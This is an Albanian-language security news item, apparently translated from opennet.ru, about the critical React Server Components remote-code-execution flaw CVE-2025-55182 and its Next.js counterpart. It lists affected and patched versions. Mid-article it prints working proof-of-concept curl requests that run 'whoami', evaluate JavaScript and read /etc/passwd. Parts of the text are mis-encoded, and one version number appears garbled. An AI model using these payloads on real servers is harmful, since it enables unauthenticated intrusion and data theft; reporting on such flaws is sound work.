Në komponentët serverikë të framework-ut web React (RSC, React Server Components) është eliminuar një rëndësi e sigurisë (CVE-2025-55182), që lejonte, përmes dërgimit të një kërkese në trajtuesin serverik, ekzekutimin e kodit të rastësishëm në server. Kjo rëndësi e sigurisë ka marrë nivel kritik rreziku (10 nga 10). Rëndësia shfaqet në komponentët eksperimentalë react-server-dom-webpack, react-server-dom-parcel dhe react-server-dom-turbopack, të përdorura për të realizuar funksionalitete dhe formuar elemente të ndërfaqes në server, jo në anën e klientit.
Problemi shkaktohet nga deserializimi i pasigurt tĂ« tĂ« dhĂ«nave qĂ« merren nĂ« kĂ«rkesat HTTP nĂ« trajtuesit serverikĂ«. Trajtuesit «vm#runInThisContext», «vm#runInNewContext», «child_process#execFileSync» dhe «child_process#execSync» mund tĂ« pĂ«rdoren pĂ«r tĂ« ekzekutuar komanda nĂ« sistem ose pĂ«r tĂ« ekzekutuar kodin JavaScript nĂ« kontekstin e procesit aktual (nĂ«pĂ«rmjet anashkalimit tĂ« izolimit tĂ« sandbox-it). Gjithashtu Ă«shtĂ« e mundur tĂ« pĂ«rdoren trajtuesit «fs#readFileSync» dhe «fs#writeFileSync» pĂ«r tĂ« lexuar dhe shkruar skedarĂ« tĂ« rastĂ«sishĂ«m nĂ« serveri, sa do lejojnĂ« tĂ« drejtat aktuale tĂ« aksesit. Nuk kĂ«rkohet autentifikim pĂ«r sulm. Prototipi i eksploitat Ă«shtĂ« i disponueshĂ«m. # Ekzekutimi i komandĂ«s whoami curl -X POST http://localhost:3002/formaction \ -F â$ACTION_REF_0=â \ -F â$ACTION_0:0={«id»:»child_process#execSync»,»bound»:[«whoami»]}â # Ekzekutimi i kodit JavaScript 1+1 curl -X POST http://localhost:3002/formaction \ -F â$ACTION_REF_0=â \ -F â$ACTION_0:0={«id»:»vm#runInThisContext»,»bound»:[«1+1»]}â # Leximi i skedarit /etc/passwd curl -X POST http://localhost:3002/formaction \ -F â$ACTION_REF_0=â \ -F â$ACTION_0:0={«id»:»fs#readFileSync»,»bound»:[«/etc/passwd»,»utf8âł]}â
Pranimi i sistemeve ndaj dobësive varet nga përdorimi i komponenteve server të dobësohura react-server-dom-webpack, react-server-dom-parcel dhe react-server-dom-turbopack. Aplikacionet që nuk përdorin react-server nuk preken nga dobësitë. Niveli i përfshirjes nga dobësitë e sistemeve të punës, në të cilat përdoret React, ende nuk është i qartë. Nga njëra anë, React është një nga framework-ët më të njohur web (përdoret në rreth 6% të faqeve web), dhe komponentët e dobësuar zhvillohen kryesisht në depo dhe përfshihen në lëshime. Komponentët e dobësuar gjithashtu mbështeten në framework-e të tjera të bazuara në React, si Next.js dhe react-router. Sipas kompanisë Wiz Research, ekzemplarët e dobësuar janë identifikuar në 39% të mjediseve cloud të analizuar.
NĂ« anĂ«n tjetĂ«r, gjenerimi i pĂ«rmbajtjes nĂ« serverin pĂ«rmes React Server KomponentĂ«t janĂ« njĂ« funksion i pĂ«rdorur rrallĂ« (shumica e faqeve tĂ« React renderojnĂ« ndĂ«rfaqen vetĂ«m nĂ« anĂ«n e klientit), dhe komponentĂ«t e cenueshĂ«m janĂ« tĂ« shĂ«nuar si eksperimentale dhe nuk garantohen pĂ«r funksionimin korrekt. KĂ«ta komponentĂ« kanĂ« njĂ« numĂ«r relativisht tĂ« vogĂ«l shkarkimesh direkte nga repositori NPM: react-server-dom-webpack â 670 mijĂ« nĂ« javĂ«, react-server-dom-parcel â 7 mijĂ« dhe react-server-dom-turbopack â 32 mijĂ«, pĂ«r krahasim, paketa NPM React ka 45 milion shkarkime nĂ« javĂ«.
Cenueshmëria është e pranishme në versionet React 9.0.0, 19.1.0, 19.1.1 dhe 19.2.0, dhe është eliminuar në përditësimet React 19.0.1, 19.1.2 dhe 19.2.1. Komponentët e cenueshëm përdoren gjithashtu në paketat Next.js (16 milion shkarkime në javë), react-router (20 milion shkarkime në javë), waku, @parcel/rsc, @vitejs/plugin-rsc dhe rwsdk.
Në framework-un Next.js, cenueshmëria (CVE-2025-66478) preku aplikacionet që përdorin App Router dhe degët Next.js 15.x dhe 16.x. Raportohet se cenueshmëria shfaqet në konfigurimin standard të Next.js (aplikacioni standard i krijuar nga utilitarja create-next-app është i prekur nga sulmi). Përdoruesve u rekomandohet të instalojnë sa më shpejt përditësimin Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7 ose 16.0.7.
Burimi: opennet.ru
